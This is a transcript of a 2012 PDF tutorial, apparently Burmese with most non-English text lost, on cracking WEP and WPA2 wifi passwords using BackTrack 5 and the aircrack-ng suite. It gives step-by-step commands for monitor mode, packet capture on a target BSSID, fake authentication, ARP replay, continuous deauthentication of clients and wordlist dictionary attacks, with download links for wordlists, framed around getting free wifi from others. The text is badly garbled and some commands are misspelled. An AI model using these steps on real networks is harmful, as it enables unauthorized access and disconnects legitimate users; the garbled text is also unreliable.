wifi hacking basic အားေဖာက္ထြင္းေလ့လာျခင္း

Upload: ohmpoe-gyi

Post on 30-Oct-2015

475 views

Category:

Documents


17 download

TRANSCRIPT

  • [WiFi Internet Connection Hacking] [WEP , WAP2 Penetration Test]

    [

    ]

    -=[ www.minsoeyarsar.com ]=- -= [email protected] =-

    2012

    N3tL0v3r [Type the company name]

    1/1/2012

    Generated by Foxit PDF Creator Foxit Softwarehttp://www.foxitsoftware.com For evaluation only.

  • WiFi Hacking Basic

    wifi free

    wifi free

    Educational

    Purpose Only wifi

    Ethicokiddie

    update

    Software

    BackTrack 5 Window boot

    VMware

    Back Track 5

    www.backtrack-linux.org Download

    Download DvD Burn .. Window First boot CD

    ROM (or) DVD ROM .. boot startx

    Generated by Foxit PDF Creator Foxit Softwarehttp://www.foxitsoftware.com For evaluation only.

  • VMware DVD Boot OS Full Speed

    VMware BackTrack OS Install

    wifi adapter

    BackTrack 5 Install

    BackTrack 5 DVD VMware Boot Box

    Boot: Enter

    Generated by Foxit PDF Creator Foxit Softwarehttp://www.foxitsoftware.com For evaluation only.

  • BackTrack Text Default Boot Text Mode Enter

    root@bt

    startx

    OS

    Generated by Foxit PDF Creator Foxit Softwarehttp://www.foxitsoftware.com For evaluation only.

  • BackTrack 5

    Back Track Linux Security Hacker

    Linux Back Track

    WEP Crack

    Generated by Foxit PDF Creator Foxit Softwarehttp://www.foxitsoftware.com For evaluation only.

  • WIFI WEP WPA

    WPA2 WEP

    Software WEP

    Crack

    Back Track Terminal Terminal Windows Command Line(CMD)

    Command airmon-ng enter

    Interface , Chipset wlan0 Adapter Detail

    Adapter Bt5

    Command airmon-ng start wlan0 enter

    command airodump-ng mon0

    Generated by Foxit PDF Creator Foxit Softwarehttp://www.foxitsoftware.com For evaluation only.

  • WEP

    WPA2 WEP

    Crack

    WEP Laptopdct

    BSSID C8:3A35:2F:E7:30

    BSSID CH Cheannel (CH) Laptopdct

    Cheannel (CH) 11 Command

    airodump-ng -w -tuan -c 11 --bssid C8:3A:35:2F:E7:30 mon0

    Generated by Foxit PDF Creator Foxit Softwarehttp://www.foxitsoftware.com For evaluation only.

  • tuan File Name -c Target

    CH C8:3A:35:2F:E7:30 Target BSSID

    Target Data

    Termainal

    airplay-ng -1 0 -a C8:3A:35:2F:E7:30 mon0

    Generated by Foxit PDF Creator Foxit Softwarehttp://www.foxitsoftware.com For evaluation only.

  • request send command

    aireplay-ng -3 -b C8:3A:35:2F:E7:30 mono

    request read

    read Target Data target

    Data

    C8:3A:35:2F:E7:30 BSSID Aireplay

    Command -1 0

    Target

    Command Data

    Data read packet

    Crack aircrack-ng tuan-01.cap

    Tuan

    tuan minsoe

    Generated by Foxit PDF Creator Foxit Softwarehttp://www.foxitsoftware.com For evaluation only.

  • Command aircrack-ng minsoe-01.cap terminal ls

    Ls(list) aircrack command Opening tuan-01.cap

    Crack

    Aircrack Password Key Found

    Key crack

    Key 3132333132 target Password Key

    A3:B5:C11:34:U7:F8:9Q:33 password

    A3B5C1134U7F89Q33

    Generated by Foxit PDF Creator Foxit Softwarehttp://www.foxitsoftware.com For evaluation only.

  • Wep Cracking

    WPA2 Cracking

    WEP WPA

    WPA Hack Packet Sniffing ? Dictionary Attack

    ? Dictionary Attack

    Packet Sniffing Dictionary Attack

    Password wordlist

    WPA2 Special Character Strong

    Password wordlist Crack

    WPA 2 Dictionary Attack

    Target Password

    wordlist Internet Download wordlist

    (1)1.1million wordlist.txt download darkc0de.lst Google WPA 2 crack wordlist

    (1)1.1million wordlist.txt download

    http://www.4shared.com/office/tvijWEkA/11million_word_list.html

    (2)darkc0de.lst download

    http://www.4shared.com/file/AF3e-0Em/darkc0de.html

    Generated by Foxit PDF Creator Foxit Softwarehttp://www.foxitsoftware.com For evaluation only.

  • back track 5 1.1 million list and darkc0de backtrack 5

    mouse

    ..

    command box (terminal ) airmon-ng

    adapter name ...

    command airmon-ng start wlan0 enter

    Generated by Foxit PDF Creator Foxit Softwarehttp://www.foxitsoftware.com For evaluation only.

  • wifi .

    Backt WPA2-CCMP-PSk ..

    Backt BSSID F8:DB:7F:46:1D:A1 CH

    (Channel) 1

    target Data copy command .

    airodump-ng -w WPACap -c 1 mon0 WPACap file name ...

    C 1 channel number ...

    command terminal ...

    aireplay-ng -0 0 -a (BSSID ) -c (Client Mac ) mon0 ..

    Generated by Foxit PDF Creator Foxit Softwarehttp://www.foxitsoftware.com For evaluation only.

  • router mac target BSSID

    Client Mac target Station

    . ..

    Airplay command Data send Data

    Target .. Data

    sending ...

    Generated by Foxit PDF Creator Foxit Softwarehttp://www.foxitsoftware.com For evaluation only.

  • Command aircrack-ng -w /root/desktop/1.1.million wordlist.txt

    WPACap-01.cap desktop 1.1.million wordlist.txt

    wordlist file /pentest

    Pentest WPAcap-01.cap

    File name Terminal ls ...

    hacktest .. hacktest-01.cap ..

    Generated by Foxit PDF Creator Foxit Softwarehttp://www.foxitsoftware.com For evaluation only.

  • aircrack wordlist Password . target

    wordlist Password darkc0de.lst

    wordlist

    wifi passwrod

    ..

    ..

    www.minsoeyarsar.com

    [email protected]

    Generated by Foxit PDF Creator Foxit Softwarehttp://www.foxitsoftware.com For evaluation only.

  • Generated by Foxit PDF Creator Foxit Softwarehttp://www.foxitsoftware.com For evaluation only.